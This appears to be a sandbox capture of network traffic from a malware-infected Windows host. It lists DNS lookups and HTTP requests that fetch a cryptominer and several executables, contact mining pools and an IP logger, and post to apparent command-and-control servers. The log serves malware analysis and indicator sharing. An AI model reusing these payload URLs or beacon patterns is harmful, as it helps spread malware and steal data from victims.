Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lGorpbwqn%2BTvAk2jDPkElJha3RcEC1MWUgiefs1fmzDAVp%2BytLvVNPeFcj5ZVNhJi8QiRkK7%2BzalTdQfCtFipx8Z%2FhtsyS4X5UuPATHsxPE5F7YQl0Gdz6bFvA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 68a6aef7befb4be3-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrigRemote address:104.192.141.1:443RequestGET /Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
X-Usage-Quota-Remaining: 996553.561
Vary: Authorization, Accept-Language, Origin
X-Usage-Request-Cost: 3485.10
Cache-Control: max-age=900
Content-Type: application/octet-stream
X-B3-TraceId: febf40b17da77ecf
X-Usage-Output-Ops: 0
X-Dc-Location: Micros
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 06 Sep 2021 09:30:37 GMT
X-Usage-User-Time: 0.104553
X-Usage-System-Time: 0.000000
X-Served-By: 89219240a235
Content-Language: en
X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
Accept-Ranges: bytes
ETag: "bccf5ffb2766fa3f110fb9301b6a23fd"
X-Static-Version: 57a14cd4beab
X-Render-Time: 0.133526086807
Content-Disposition: attachment
Connection: Keep-Alive
X-Usage-Input-Ops: 0
X-Request-Count: 2124
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 Aug 2021 01:00:45 GMT
X-Version: 57a14cd4beab
X-Cache-Info: cached
Content-Length: 2069251
-
GEThttps://ieonline.microsoft.com/iedomainsuggestions/ie11/suggestions.ja-JPRemote address:204.79.197.200:443RequestGET /iedomainsuggestions/ie11/suggestions.ja-JP HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ieonline.microsoft.com
Connection: Keep-Alive
Cookie: MUID=2426B5E44661623B31D3A54247E56356; _EDGE_V=1; MUIDB=2426B5E44661623B31D3A54247E56356
ResponseHTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Length: 17450
Content-Type: application/octet-stream
ETag: HMczYRAM4VNT8lcaA6XVo2S+h9I=
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: _EDGE_S=SID=03A36923A9DA6A9200FF7989A85E6BC2; domain=.microsoft.com; path=/; HttpOnly
Set-Cookie: SRCHD=AF=NOFORM; domain=.microsoft.com; expires=Sat, 01-Oct-2022 09:31:24 GMT; path=/
Set-Cookie: SRCHUID=V=2&GUID=DA7A93CA91A24AF7992EC0B733F2032F&dmnchg=1; domain=.microsoft.com; expires=Sat, 01-Oct-2022 09:31:24 GMT; path=/
Set-Cookie: SRCHUSR=DOB=20210906; domain=.microsoft.com; expires=Sat, 01-Oct-2022 09:31:24 GMT; path=/
Set-Cookie: SRCHHPGUSR=SRCHLANG=nl; domain=.microsoft.com; expires=Sat, 01-Oct-2022 09:31:24 GMT; path=/
Set-Cookie: _SS=SID=03A36923A9DA6A9200FF7989A85E6BC2; domain=.microsoft.com; path=/
X-SNR-Routing: 1
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 562F755246FC4612B55E5D0BCFE4455E Ref B: AMBEDGE0818 Ref C: 2021-09-06T09:31:24Z
Date: Mon, 06 Sep 2021 09:31:23 GMT
-
DNSpastebin.comRemote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A104.23.99.190pastebin.comIN A104.23.98.190
-
DNSxmr-eu2.nanopool.orgRemote address:8.8.8.8:53Requestxmr-eu2.nanopool.orgIN AResponsexmr-eu2.nanopool.orgIN A51.255.34.80xmr-eu2.nanopool.orgIN A151.80.144.188xmr-eu2.nanopool.orgIN A213.32.74.157xmr-eu2.nanopool.orgIN A51.15.55.100xmr-eu2.nanopool.orgIN A51.15.55.162xmr-eu2.nanopool.orgIN A51.255.34.79xmr-eu2.nanopool.orgIN A51.15.67.17
-
DNSxmr-eu1.nanopool.orgRemote address:8.8.8.8:53Requestxmr-eu1.nanopool.orgIN AResponsexmr-eu1.nanopool.orgIN A51.255.34.118xmr-eu1.nanopool.orgIN A51.15.58.224xmr-eu1.nanopool.orgIN A51.83.33.228xmr-eu1.nanopool.orgIN A51.15.78.68xmr-eu1.nanopool.orgIN A51.68.143.81xmr-eu1.nanopool.orgIN A46.105.31.147xmr-eu1.nanopool.orgIN A185.71.66.31xmr-eu1.nanopool.orgIN A217.182.169.148xmr-eu1.nanopool.orgIN A51.15.54.102xmr-eu1.nanopool.orgIN A51.15.65.182xmr-eu1.nanopool.orgIN A135.125.238.108xmr-eu1.nanopool.orgIN A51.15.69.136
-
DNSgoogle.comRemote address:8.8.8.8:53Requestgoogle.comIN AResponsegoogle.comIN A142.251.36.46
-
DNScdn.doubleverify.comRemote address:8.8.8.8:53Requestcdn.doubleverify.comIN AResponsecdn.doubleverify.comIN CNAMEakacdn.doubleverify.com.edgekey.netakacdn.doubleverify.com.edgekey.netIN CNAMEe17513.dscd.akamaiedge.nete17513.dscd.akamaiedge.netIN A2.18.110.226
-
DNSvarmisende.comRemote address:8.8.8.8:53Requestvarmisende.comIN AResponse
-
DNSvarmisende.comRemote address:8.8.8.8:53Requestvarmisende.comIN AResponse
-
DNSvarmisende.comRemote address:8.8.8.8:53Requestvarmisende.comIN AResponse
-
DNSvarmisende.comRemote address:8.8.8.8:53Requestvarmisende.comIN AResponse
-
POSThttps://connectini.net/Series/Conumer2kenpachi.phpRemote address:162.0.210.44:443RequestPOST /Series/Conumer2kenpachi.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:31:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
GEThttps://connectini.net/Series/kenpachi/2/goodchannel/NL.jsonRemote address:162.0.210.44:443RequestGET /Series/kenpachi/2/goodchannel/NL.json HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:45 GMT
Content-Type: application/json
Content-Length: 46252
Last-Modified: Mon, 06 Sep 2021 09:30:04 GMT
Connection: keep-alive
ETag: "6135df9c-b4ac"
X-Powered-By: PleskLin
Accept-Ranges: bytes
-
GEThttps://connectini.net/Series/configPoduct/2/goodchannel.jsonRemote address:162.0.210.44:443RequestGET /Series/configPoduct/2/goodchannel.json HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:46 GMT
Content-Type: application/json
Content-Length: 344
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Thu, 18 Mar 2021 13:04:50 GMT
ETag: "158-5bdcf3ea0785e"
Accept-Ranges: bytes
X-Powered-By: PleskLin
-
GEThttps://connectini.net/ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_notezzlylRemote address:162.0.210.44:443RequestGET /ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_notezzlyl HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
GEThttps://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lyloutta_traidinganalyzerwwRemote address:162.0.210.44:443RequestGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lyloutta_traidinganalyzerww HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
GEThttps://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_AskhelpfinderWWRemote address:162.0.210.44:443RequestGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_AskhelpfinderWW HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
GEThttps://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lyloutta_PCCleanerPRORemote address:162.0.210.44:443RequestGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lyloutta_PCCleanerPRO HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
GEThttps://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanagerRemote address:162.0.210.44:443RequestGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanager HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
GEThttps://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_kosmedia_XtexRemote address:162.0.210.44:443RequestGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_kosmedia_Xtex HTTP/1.1
Host: connectini.net
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
-
DNSfernandomayol.comRemote address:8.8.8.8:53Requestfernandomayol.comIN AResponse
-
DNSalfad.proRemote address:8.8.8.8:53Requestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSnextlytm.comRemote address:8.8.8.8:53Requestnextlytm.comIN AResponse
-
DNStaskthesa.clubRemote address:8.8.8.8:53Requesttaskthesa.clubIN AResponsetaskthesa.clubIN A13.227.222.62taskthesa.clubIN A13.227.222.98taskthesa.clubIN A13.227.222.43taskthesa.clubIN A13.227.222.74
-
DNSpeople4jan.comRemote address:8.8.8.8:53Requestpeople4jan.comIN AResponse
-
DNSasfaltwerk.comRemote address:8.8.8.8:53Requestasfaltwerk.comIN AResponse
-
DNSco.akisinn.infoRemote address:8.8.8.8:53Requestco.akisinn.infoIN AResponseco.akisinn.infoIN A34.117.177.88
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 58
Date: Mon, 06 Sep 2021 09:32:47 GMT
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 57
Date: Mon, 06 Sep 2021 09:32:49 GMT
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 56
Date: Mon, 06 Sep 2021 09:32:50 GMT
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 55
Date: Mon, 06 Sep 2021 09:32:52 GMT
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 54
Date: Mon, 06 Sep 2021 09:32:54 GMT
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 51
Date: Mon, 06 Sep 2021 09:32:56 GMT
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 48
Date: Mon, 06 Sep 2021 09:32:58 GMT
-
GEThttp://194.145.227.159/pub.php?pub=fiveRemote address:194.145.227.159:80RequestGET /pub.php?pub=five HTTP/1.1
Host: 194.145.227.159
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 06 Sep 2021 09:32:48 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
-
GEThttp://194.145.227.159/pub.php?pub=fiveRemote address:194.145.227.159:80RequestGET /pub.php?pub=five HTTP/1.1
Host: 194.145.227.159
ResponseHTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 06 Sep 2021 09:32:53 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
-
DNSsource3.boys4dayz.comRemote address:8.8.8.8:53Requestsource3.boys4dayz.comIN AResponsesource3.boys4dayz.comIN A172.67.148.61source3.boys4dayz.comIN A104.21.33.188
-
GEThttps://source3.boys4dayz.com/installer.exeRemote address:172.67.148.61:443RequestGET /installer.exe HTTP/1.1
Host: source3.boys4dayz.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:32:49 GMT
Content-Type: application/octet-stream
Content-Length: 3628856
Connection: keep-alive
last-modified: Fri, 07 May 2021 09:32:20 GMT
etag: "60950924-375f38"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 1464
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A0e0i7EKlx%2F%2BzGpAo93HYcuLNq2rA%2B55ry0nwrU81996JQcYAuxYmr3n%2FMRWhSzvTMBLYwb9narjBE%2BfAqZyxuXrsxB3RjlL3Ou%2FBWxt4C8FRTJEfQussyxvQfxrq9gxdUFqJGZCoW8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6b13c3bf60c11-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNShtagzdownload.pwRemote address:8.8.8.8:53Requesthtagzdownload.pwIN AResponse
-
DNSaa.goatgamea.comRemote address:8.8.8.8:53Requestaa.goatgamea.comIN AResponseaa.goatgamea.comIN A104.21.62.66aa.goatgamea.comIN A172.67.221.12
-
GEThttps://aa.goatgamea.com/userdow/25/anyname.exeRemote address:104.21.62.66:443RequestGET /userdow/25/anyname.exe HTTP/1.1
Host: aa.goatgamea.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:32:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
location: https://bb.goatgameb.com/userdow/25/ff026d492a4e3c82042fae97cbf29e73.exe
CF-Cache-Status: BYPASS
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8jNLNE7qpSBufhkeZ2eXL8MTY7x96cpHIwe5o03F95YbO8CmQ49oz%2Fza5FZxbR4XUIPX%2B03V%2FLfpVa0Plgth6RIWAxjkmJ0sVnQ1W%2BjFcpLE3ioYz0TV9oaY39YN13Dtvy3%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6b143b91cfaa4-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSbb.goatgameb.comRemote address:8.8.8.8:53Requestbb.goatgameb.comIN AResponsebb.goatgameb.comIN A104.21.28.120bb.goatgameb.comIN A172.67.146.7
-
GEThttps://bb.goatgameb.com/userdow/25/ff026d492a4e3c82042fae97cbf29e73.exeRemote address:104.21.28.120:443RequestGET /userdow/25/ff026d492a4e3c82042fae97cbf29e73.exe HTTP/1.1
Host: bb.goatgameb.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:32:52 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
content-disposition: attachment; filename="zhangguizhi-game.exe"
content-transfer-encoding: binary
vary: Accept-Encoding
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2981
Last-Modified: Mon, 06 Sep 2021 08:43:11 GMT
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KdlgnFfuCpq1%2B3RpSeICfiEP0zw8XiCmgB%2BL7V39mtrJ1phaaJaNxZkmAxAh7q3xf0%2FbjdB%2FXAT%2FhrBMR2O4c2W3KumYvKdx3KbmTArdYdd9L2EvZ1IepgnSuIlkT2zGWiL%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6b149adaa012a-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://iplogger.org/1Xxky7Remote address:88.99.66.31:443RequestGET /1Xxky7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:52 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=jahvp8fp8d312uerrvpqvcbp33; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=248127419; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
DNSfsstoragecloudservice.comRemote address:8.8.8.8:53Requestfsstoragecloudservice.comIN AResponsefsstoragecloudservice.comIN A111.90.156.46
-
GEThttp://fsstoragecloudservice.com/campaign3/autosubplayer.exeRemote address:111.90.156.46:80RequestGET /campaign3/autosubplayer.exe HTTP/1.1
Host: fsstoragecloudservice.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Connection: Keep-Alive
X-Powered-By: PHP/7.4.22
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 06 Sep 2021 09:32:54 GMT
Server: LiteSpeed
-
DNSa.goatgame.coRemote address:8.8.8.8:53Requesta.goatgame.coIN AResponsea.goatgame.coIN A104.21.79.144a.goatgame.coIN A172.67.146.70
-
GEThttps://a.goatgame.co/userf/dat/25/sqlite.datRemote address:104.21.79.144:443RequestGET /userf/dat/25/sqlite.dat HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: a.goatgame.co
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:32:59 GMT
Content-Length: 578665
Connection: keep-alive
last-modified: Wed, 28 Jul 2021 11:35:53 GMT
etag: "8d469-5c82d6395701a"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CkpCmBQIXyOVdV4z5Y8tU5cQYXUdOMPfOV11q4cg%2FSKZsvvqOgKz3xVWsqUirJrN1l7fOqIC5hRZS82NxFCUXyNxOt%2FrTHLU0XLty1%2FGdcv4ux1RX%2F1oIRhmA5bgxgY%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6b17728a64c0e-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttps://a.goatgame.co/userf/dat/sqlite.dllRemote address:104.21.79.144:443RequestGET /userf/dat/sqlite.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: a.goatgame.co
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:33:01 GMT
Content-Type: application/x-msdownload
Content-Length: 13312
Connection: keep-alive
last-modified: Fri, 27 Aug 2021 04:30:17 GMT
etag: "3400-5ca82f0bd6e46"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pF9U36VRHSBCFiEqSNqTGS0ldqhGza6QONqnNvNako3q1irPqeRvUJBNzRq%2FxB5HzL3ngcu%2F4zQSvFujRq7%2BYB78e%2Fqkz8yzhrP4dooPYp76K8cfK516P1QH%2B3GbXRLc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6b1822f2f4c0e-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNScleaner-partners.bizRemote address:8.8.8.8:53Requestcleaner-partners.bizIN AResponsecleaner-partners.bizIN A5.230.68.37cleaner-partners.bizIN A46.8.29.181
-
GEThttp://cleaner-partners.biz/stats/1.php?pub=/eufive%20Remote address:5.230.68.37:80RequestGET /stats/1.php?pub=/eufive%20 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: cleaner-partners.biz
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:32:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
-
GEThttp://cleaner-partners.biz/check.php?pub=eufiveRemote address:5.230.68.37:80RequestGET /check.php?pub=eufive HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: xN-Ok-qy-5e-Y-P
Host: cleaner-partners.biz
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:33:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
-
GEThttp://cleaner-partners.biz/stats/1.php?pub=/mixfive%20Remote address:5.230.68.37:80RequestGET /stats/1.php?pub=/mixfive%20 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: cleaner-partners.biz
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:33:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
-
GEThttp://cleaner-partners.biz/check.php?pub=mixfiveRemote address:5.230.68.37:80RequestGET /check.php?pub=mixfive HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: z4-Pg-c8-ih-q-f
Host: cleaner-partners.biz
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:33:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRemote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
